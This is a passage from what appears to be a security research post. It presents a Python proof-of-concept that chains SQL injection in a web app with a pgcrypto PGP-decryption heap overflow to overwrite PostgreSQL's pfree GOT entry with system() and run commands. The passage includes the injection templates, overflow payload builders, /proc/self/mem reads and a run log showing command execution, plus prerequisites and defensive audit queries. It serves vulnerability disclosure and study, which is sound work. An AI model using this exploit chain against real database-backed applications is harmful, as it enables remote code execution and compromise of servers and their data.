The app runs in single-threaded mode with a persistent psycopg2 connection, so every HTTP request from the attacker hits the same PostgreSQL backend. This is what makes the multi-step attack possible: the GOT overwrite from step 6 is still in memory when step 8 fires.

Here is the proof-of-concept exploit, followed by a walkthrough of the important parts:

import os, sys, struct, hashlib, time, argparse, requests
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend

OVERFLOW_SIZE = 222
PGP_PKT_SESSKEY = 1
PGP_PKT_SYMENC = 9
PGP_PKT_LITERAL = 11
PGP_SYM_AES128 = 7

# PGP packet construction

def old_pkt(tag, body):
    n = len(body)
    if n < 256: hdr = bytes([0x80|(tag<<2)|0, n])
    elif n < 65536: hdr = bytes([0x80|(tag<<2)|1]) + struct.pack('>H', n)
    else: hdr = bytes([0x80|(tag<<2)|2]) + struct.pack('>I', n)
    return hdr + body

def mpi_enc(v):
    return struct.pack('>H', v.bit_length()) + v.to_bytes((v.bit_length()+7)//8, 'big')

def pkcs1_encrypt(M, n, e):
    nb = (n.bit_length()+7)//8
    ps = b''
    while len(ps) < nb-3-len(M):
        b = os.urandom(1)
        if b != b'\x00': ps += b
    return pow(int.from_bytes(b'\x00\x02'+ps+b'\x00'+M, 'big'), e, n)

def build_sesskey_pkt(key_id, n, e, algo, sesskey_bytes):
    ck = sum(sesskey_bytes) & 0xFFFF
    M = bytes([PGP_SYM_AES128]) + sesskey_bytes + struct.pack('>H', ck)
    return old_pkt(PGP_PKT_SESSKEY, bytes([3]) + key_id + bytes([algo]) + mpi_enc(pkcs1_encrypt(M, n, e)))

def build_plaintext(data, fail_prefix=True):
    pfx = bytearray(os.urandom(14))
    pfx += bytes([0xAA,0xBB,0xCC,0xDD]) if fail_prefix else bytes([0xAA,0xBB,0xAA,0xBB])
    return bytes(pfx) + old_pkt(PGP_PKT_LITERAL, bytes([0x62,0x00]) + b'\x00\x00\x00\x00' + data)

# PGP CFB resync mode

def aes_ecb(key, block):
    c = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    return c.update(block) + c.finalize()

def pgp_cfb_encrypt(key, pt, bs=16):
    fr, encbuf = bytearray(bs), bytearray(bs)
    fre = bytearray(bs)  # keystream block; initialized so it is never read while unbound
    pos = blk = idx = 0; rem = len(pt); ct = bytearray()
    while rem > 0:
        while rem > 0 and pos > 0:
            n = min(bs-pos, rem)
            if blk == 2:
                n2 = min(2-pos, n)
                for j in range(n2):
                    c = fre[pos+j]^pt[idx+j]; encbuf[pos+j]=c; ct.append(c)
                pos+=n2; idx+=n2; rem-=n2
                if pos==2: fr=bytearray(encbuf[2:bs])+bytearray(encbuf[0:2]); pos=0; break
            else:
                for j in range(n):
                    c = fre[pos+j]^pt[idx+j]; encbuf[pos+j]=c; ct.append(c)
                pos+=n; idx+=n; rem-=n
            if pos==bs: fr=bytearray(encbuf[:bs]); pos=0
        if rem <= 0: break
        fre = bytearray(aes_ecb(key, bytes(fr)))
        if blk < 5: blk += 1
        n = min(bs, rem)
        if blk == 2:
            n2 = min(2, n)
            for j in range(n2):
                c = fre[j]^pt[idx+j]; encbuf[j]=c; ct.append(c)
            pos=n2; idx+=n2; rem-=n2
            if pos==2: fr=bytearray(encbuf[2:bs])+bytearray(encbuf[0:2]); pos=0
        else:
            for j in range(n):
                c = fre[j]^pt[idx+j]; encbuf[j]=c; ct.append(c)
            pos=n; idx+=n; rem-=n
            if pos==bs: fr=bytearray(encbuf[:bs]); pos=0
    return bytes(ct)

# overflow payload builders

def build_overflow(L, skey, sql_addr, p1len, symenc_len, target):
    p = bytearray(OVERFLOW_SIZE)
    p[0:16] = skey; p[16:32] = b'\x00'*16
    struct.pack_into('<I', p, L['off_sess_key_len'], 16)
    ss = sql_addr + p1len
    st = symenc_len + (3 if symenc_len >= 256 else 2)
    struct.pack_into('<Q', p, L['off_src_hdrmask'], L['src_hdrmask'])
    struct.pack_into('<Q', p, L['off_src_data'], sql_addr)
    struct.pack_into('<Q', p, L['off_src_data_end'], ss+st)
    struct.pack_into('<Q', p, L['off_src_read_pos'], ss)
    struct.pack_into('<Q', p, L['off_src_buf_end'], ss+st)
    p[L['off_src_no_write']]=1; p[L['off_src_own_data']]=0
    struct.pack_into('<Q', p, L['off_dst_hdrmask'], L['dst_hdrmask'])
    struct.pack_into('<Q', p, L['off_dst_data'], target)
    struct.pack_into('<Q', p, L['off_dst_data_end'], target)
    struct.pack_into('<Q', p, L['off_dst_read_pos'], target)
    struct.pack_into('<Q', p, L['off_dst_buf_end'], target+0x1000)
    p[L['off_dst_no_write']]=0; p[L['off_dst_own_data']]=0
    return bytes(p)

def build_trigger(L, cmd_addr):
    p = bytearray(OVERFLOW_SIZE)
    struct.pack_into('<I', p, L['off_sess_key_len'], OVERFLOW_SIZE)
    struct.pack_into('<Q', p, L['off_src_hdrmask'], L['src_hdrmask'])
    for o in (L['off_src_data'],L['off_src_data_end'],L['off_src_read_pos'],L['off_src_buf_end']):
        struct.pack_into('<Q', p, o, 0x1)
    p[L['off_src_no_write']]=1; p[L['off_src_own_data']]=0
    struct.pack_into('<Q', p, L['off_dst_hdrmask'], L['dst_hdrmask'])
    for o in (L['off_dst_data'],L['off_dst_data_end'],L['off_dst_read_pos'],L['off_dst_buf_end']):
        struct.pack_into('<Q', p, o, cmd_addr)
    p[L['off_dst_no_write']]=1; p[L['off_dst_own_data']]=1
    return bytes(p)

# attacker keypair

def gen_keypair():
    sk = rsa.generate_private_key(65537, 2048, default_backend())
    pn = sk.private_numbers()
    n, e, d, p, q = pn.public_numbers.n, pn.public_numbers.e, pn.d, pn.p, pn.q
    u = pow(p, -1, q)
    pub = b'\x04\x00\x00\x00\x00' + bytes([2]) + mpi_enc(n) + mpi_enc(e)
    kid = hashlib.sha1(b'\x99' + struct.pack('>H', len(pub)) + pub).digest()[-8:]
    sec = mpi_enc(d) + mpi_enc(p) + mpi_enc(q) + mpi_enc(u)
    body = pub + b'\x00' + sec + struct.pack('>H', sum(sec)%65536)
    lh = struct.pack('>H', len(body))
    return n, e, kid, 2, b'\x95'+lh+body+b'\x9d'+lh+body

# ELF resolution

def _elf_rb(path, url=None):
    def rb(off, sz):
        h = sqli_query(f"SELECT encode(pg_read_binary_file('{path}',{off},{sz}),'hex')", url)
        return bytes.fromhex(h) if h else b''
    return rb

# ... resolve_sym_libc, resolve_got_slot, resolve_bss, resolve_structs,
#     compute_layout (~160 lines of ELF parsing + x86 disassembly)
#     See full source for details.

# SQLi primitives

TARGET_URL = "http://localhost:8080"
SESSION = requests.Session()

def sqli_query(expr, url=None):
    try:
        r = SESSION.post(f"{url or TARGET_URL}/search",
            data={"q": f"' UNION SELECT 1,({expr})::text,'x',1 --"}, timeout=30)
        if r.status_code == 200:
            for row in r.json().get("results",[]):
                if str(row.get("description"))=="x": return row.get("name")
        return None
    except Exception: return None

def sqli_blind(expr, url=None):
    try:
        r = SESSION.post(f"{url or TARGET_URL}/search",
            data={"q": f"' UNION SELECT 1,({expr})::text,'x',1 --"}, timeout=30)
        if r.status_code == 200: return True, None
        if r.status_code == 503: return False, "crashed"
        try: d = r.json().get("detail","")
        except Exception: d = r.text[:200]
        return True, d
    except (requests.exceptions.ConnectionError, requests.exceptions.Timeout):
        return False, "connection_error"
    except Exception as e: return True, str(e)

def bytea_lit(d): return f"decode('{d.hex()}','hex')"
def read_maps(url=None): return sqli_query("SELECT pg_read_file('/proc/self/maps')", url)
def read_mem(a, n, url=None):
    h = sqli_query(f"SELECT encode(pg_read_binary_file('/proc/self/mem',{a},{n}),'hex')", url)
    return bytes.fromhex(h) if h else None
def send_overflow(msg, key, url=None):
    return sqli_blind(f"pgp_pub_decrypt_bytea({bytea_lit(msg)},{bytea_lit(key)})::text", url)

# calibration + GOT overwrite

def calibrate_and_got_write(kid, n, e, algo, sk, heap, got, sysaddr, skey, L, bss_probe, url=None):
    got_ct = pgp_cfb_encrypt(skey, build_plaintext(struct.pack("<Q",sysaddr), fail_prefix=True))
    p1len = len(build_sesskey_pkt(kid,n,e,algo,bytes(OVERFLOW_SIZE)))
    marker = b"CALIBRATE_OK"
    probe_ct = pgp_cfb_encrypt(skey, build_plaintext(marker, fail_prefix=True))

    def spiral(c, hr, s):
        for d in range(0,hr,s):
            yield c+d
            if d: yield c-d
    def probe(off):
        a = heap+off+4
        try: ov = build_overflow(L, skey, a, p1len, len(probe_ct), bss_probe)
        except Exception: return False, False
        for _ in range(5):
            p1 = build_sesskey_pkt(kid,n,e,algo,ov)
            if len(p1)==p1len: break
        else: return False, False
        ok,_ = send_overflow(p1+old_pkt(PGP_PKT_SYMENC, probe_ct), sk, url)
        if not ok: return False, True
        d = read_mem(bss_probe, len(marker)+8, url)
        return (d is not None and marker in d), False

    # spiral outward from center, 8-byte steps, +/-32KB
    hit = None
    for off in spiral(0x199580, 0x8000, 0x08):
        h, crashed = probe(off)
        if crashed: wait_reconnect(url); continue  # wait_reconnect: helper not shown in this listing
        if h: hit=off; break
    if hit is None: return None, None

    # fine-tune
    for off in spiral(hit, 0x40, 0x08):
        h,_ = probe(off)
        if h: hit=off; break

    addr = heap+hit+4
    # GOT overwrite
    for _ in range(20):
        ov = build_overflow(L, skey, addr, p1len, len(got_ct), got)
        p1 = build_sesskey_pkt(kid,n,e,algo,ov)
        if len(p1)==p1len: break
    send_overflow(p1+old_pkt(PGP_PKT_SYMENC, got_ct), sk, url)

    g = read_mem(got, 8, url)
    if g and struct.unpack("<Q",g)[0]==sysaddr:
        return addr, p1len
    return None, None

# main: ties it all together
def main():
    # 1. Verify SQLi, check pgcrypto
    # 2. gen_keypair()
    # 3. read_maps() -> ELF resolution (system, pfree@GOT, .bss, struct sizes)
    # 4. calibrate_and_got_write() -> blind probe + GOT overwrite
    # 5. Pipeline write command to .bss
    # 6. Trigger: pfree(.bss_cmd) -> system(cmd)
    ...  # outline only; the body is not shown in this listing

The ELF resolution functions (resolve_sym_libc, resolve_got_slot, resolve_bss, resolve_structs, compute_layout) are omitted from the listing for brevity: they are 160 lines of ELF parsing and x86 disassembly that read pgcrypto.so and libc.so from disk via SQL. The full source is in the repository.

Here's what the important pieces do:

  • sqli_query / sqli_blind: the injection primitives. Every interaction with PostgreSQL goes through these two functions. sqli_query returns data (used for reading /proc, ELF parsing, memory verification). sqli_blind fires side-effect queries (the overflow itself) and reports whether the backend survived. The injection template is always ' UNION SELECT 1,(EXPR)::text,'x',1 --, where the 'x' marker identifies the injected row in the JSON response.
  • gen_keypair: generates a fresh RSA-2048 keypair in OpenPGP binary format. The secret key is bundled as both a SECRET_KEY (tag 5) and SECRET_SUBKEY (tag 7) packet - pgcrypto skips the former and uses the latter. This means the attacker doesn't need to extract keys from the database; they bring their own.
  • build_overflow: constructs the 222-byte overflow payload. The first 16 bytes become the AES-128 session key. Bytes at the dynamically computed offsets overwrite src and dst MBuf structs: src->read_pos points at the SYMENCRYPTED_DATA ciphertext in the SQL argument, dst->data_end points at the write target (pfree@GOT or .bss). The MemoryChunk hdrmask values are computed from the AllocSet block layout so that pfree() during cleanup doesn't crash.
  • build_trigger: a simpler overflow for the final step. Sets dst->data = .bss_cmd_addr and dst->own_data = 1, with buf_end == data so px_memset zeroes 0 bytes. When mbuf_free(dst) runs during cleanup, it calls pfree(.bss_cmd) - which is now system("touch /tmp/pwned").
  • calibrate_and_got_write: the heart of the exploit. Sends ~3600 probes in a spiral pattern, each attempting a pipeline write of "CALIBRATE_OK" to a .bss address, then reads .bss via /proc/self/mem to check if the marker landed. Once the heap offset is found, it immediately sends the real payload: system@libc (8 bytes) written to pfree@GOT via the AES-CFB pipeline. The GOT overwrite is verified by reading the GOT entry back through /proc/self/mem.
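The search order used by calibrate_and_got_write can be reproduced offline. The sketch below copies the spiral generator from the listing and counts what it yields. The helper probe_index is ours and purely illustrative; nothing here touches a network or a database.

```python
def spiral(center, half_range, step):
    """Yield center, center+step, center-step, center+2*step, ... (same order as the listing)."""
    for d in range(0, half_range, step):
        yield center + d
        if d:
            yield center - d

def probe_index(center, half_range, step, target):
    """Hypothetical helper: 1-based position of target in the spiral, or None if never visited."""
    for i, off in enumerate(spiral(center, half_range, step), start=1):
        if off == target:
            return i
    return None

CENTER, HALF_RANGE, STEP = 0x199580, 0x8000, 0x08  # values from the listing

first = list(spiral(CENTER, HALF_RANGE, STEP))[:5]
print([hex(o) for o in first])

# Total number of candidates in a +/-32KB window at 8-byte steps
worst_case = sum(1 for _ in spiral(CENTER, HALF_RANGE, STEP))
print(worst_case)

# Position of the hit offset reported in the run log of this post
print(probe_index(CENTER, HALF_RANGE, STEP, 0x19ce28))
```

With these parameters the window holds 8191 candidates, and the offset 0x19ce28 sits at position 3626, which agrees with the probe count printed in the run log.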

A successful run:

Target: http://localhost:9090  Cmd: touch /tmp/pwned
PostgreSQL 19devel on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2....
Key: bdb15bc47a7797f5
pgcrypto=0x7ffff4fc4000 libc=0x7ffff773e000 heap=0x5555561af000
GOT=0x7ffff4fec060 system=0x7ffff778a490 bss=0x7ffff4ff66c8
ctx=184B mbuf=40B src@+116 dst@+188
Heap probe (step=0x8, range=+/-0x8000)...
Hit heap+0x19ce28 (3626 probes)
VARDATA: 0x55555634be2c
pfree@GOT = system (0x7ffff778a490)
.bss = "touch /tmp/pwned"
system("touch /tmp/pwned") triggered

$ ls -la /tmp/pwned
-rw------- 1 ed ed 0 Apr  9 02:29 /tmp/pwned

Figure 4: Full SQLi to RCE chain. Each stage flows through the same UNION-based injection primitive; the persistent backend connection carries GOT state across requests.
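The numbers in the run log can be cross-checked by hand. A minimal sketch, assuming the log values are copied verbatim and that VARDATA corresponds to the heap+hit+4 expression in the listing; the variable names are ours:

```python
import struct

heap_base = 0x5555561af000     # heap= from the run log
hit = 0x19ce28                 # "Hit heap+0x19ce28"
system_addr = 0x7ffff778a490   # system= from the run log

# Same arithmetic as `addr = heap+hit+4` in the listing
vardata = heap_base + hit + 4
print(hex(vardata))

# The 8-byte little-endian value the listing packs with struct.pack("<Q", sysaddr),
# and the readback comparison it performs with struct.unpack
payload = struct.pack("<Q", system_addr)
print(payload.hex())
readback_ok = struct.unpack("<Q", payload)[0] == system_addr
print(readback_ok)
```

The computed address is 0x55555634be2c, the same value the log prints on its VARDATA line.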

Prerequisites and constraints

Required:

  1. The pg_read_server_files role on the PostgreSQL user (this is NOT superuser; it is a lower-privilege role that notably can't use COPY ... PROGRAM)
  2. The pgcrypto extension loaded (CREATE EXTENSION pgcrypto)
  3. Linux with procfs mounted (no hidepid=2)
  4. x86-64 architecture
  5. A server/proxy that lets requests at that rate through: if the target build differs from the one the exploit was tuned for, calibration can take thousands of HTTP requests (3,626 probes in the run above)
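From the defender's side, the two database-level items on this list are easy to audit. The sketch below is an assumption-laden illustration rather than a complete check: the dictionary and function names are ours, the queries are meant to be run as the application's database role, and the OS-level items (procfs, architecture, rate limiting) are not covered.

```python
# SQL a DBA could run, connected as the web application's role, to see
# whether the database-side prerequisites hold for that role.
AUDIT_QUERIES = {
    "pgcrypto_installed":
        "SELECT EXISTS (SELECT 1 FROM pg_extension WHERE extname = 'pgcrypto')",
    "role_reads_server_files":
        "SELECT pg_has_role(current_user, 'pg_read_server_files', 'MEMBER')",
}

def exposed(results):
    """results maps each AUDIT_QUERIES key to the boolean its query returned.

    Returns True only if every database-side prerequisite is met.
    A missing key is treated as "not met".
    """
    return all(results.get(name, False) for name in AUDIT_QUERIES)

# Example: pgcrypto is installed but the role cannot read server files
print(exposed({"pgcrypto_installed": True, "role_reads_server_files": False}))
```

Revoking pg_read_server_files from application roles that do not need it removes one of the listed prerequisites without touching the application itself.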

Not required:

  • The PGP private key (the attacker generates their own keypair)
  • Direct PostgreSQL access (works entirely through SQL injection)
  • Prior knowledge of the target build (all binary offsets resolved dynamically)

But there is still a build-specific parameter that you won't know without an oracle: the heap offset center estimate (~0x199580 for the SQLi path on this build). This varies with the SQL execution path, compiler flags, and libc version. The ±32KB spiral search covers typical variance within a given configuration.
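To make the coverage claim concrete, here is a small sketch of which heap offsets the search can ever visit. It models only the grid of visited offsets (center, window, step taken from the listing), not whether a near miss would still work; the function name is ours.

```python
CENTER = 0x199580     # empirical center estimate quoted above
HALF_RANGE = 0x8000   # +/-32KB window
STEP = 0x08           # 8-byte steps

def visited(target, center=CENTER, half_range=HALF_RANGE, step=STEP):
    """True if the spiral search would try `target` at some point."""
    delta = abs(target - center)
    return delta < half_range and delta % step == 0

print(visited(0x19ce28))          # hit offset from the run log
print(visited(CENTER + 0x8000))   # first offset past the window
print(visited(0x19ce28 + 4))      # inside the window, but off the 8-byte grid
```

In the logged run the hit lies 0x38a8 bytes above the center, comfortably inside the window. A build whose true offset falls outside ±32KB of the center would exhaust the search without a hit.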

Commentary on the PoC

This exploit, fragile and fascinating as it is, was written for research purposes, purely to show that memory corruption bugs inside SQL databases can be abused to do far worse than DoS the server. The goal of this research is to raise awareness of this underestimated corner of software security.

Impact

Unlike most memory corruption bugs in large codebases, this one is reachable through web applications, because the vulnerable code is directly accessible via SQL queries. That lets a sophisticated actor gain remote command execution without ever leaving the context of the web application. It is not a loud, obvious memory corruption; it is the kind of bug nobody defends against at this layer, because memory corruption is the last vulnerability class anyone expects to find hiding inside an SQL querying mechanism. One could call this a supply chain case, but the component is not a typical third-party library: it lives inside the DBMS, where no one thought to look.

Closing thoughts

Today's post describes an exploitation path that requires special conditions, but the deeper message we want to convey is that web application security is not only about XSS or prototype pollution. Most of the software that forms the bones of frameworks and libraries is brittle, with multiple attack vectors and surfaces. And a lot of critical attacks come from below, from the lowlands of memory corruption.

Although reliable, full-on exploitation requires additional quirks, corrupting the pointers of an esoteric Postgres structure (MBuf) and repurposing the AES-CFB decryption pipeline as an arbitrary write primitive is satisfying in its simplicity. There's no ROP chain, no shellcode, no heap spray. The program's own decryption logic does the writing for us, through a completely normal code path that it was always going to execute. We just change where it reads from and where it writes to.

The engineering effort was mostly about reliability and portability. The dynamic ELF resolution and struct-size-from-disassembly techniques mean the exploit adapts to different pgcrypto builds without precomputed offset tables. The blind heap calibration is the weakest link: it works, but ~3600 HTTP probes is slow, and the center estimate is still empirical and will fail against a more sophisticated backend. A future improvement would be to leak the bytea address within a single SQL statement, eliminating the calibration phase entirely.

Attributions

  • The initial vulnerability and CVE were discovered and reported by Team Xint Code during 0day.cloud.
  • Images were generated by the large language model Claude Sonnet.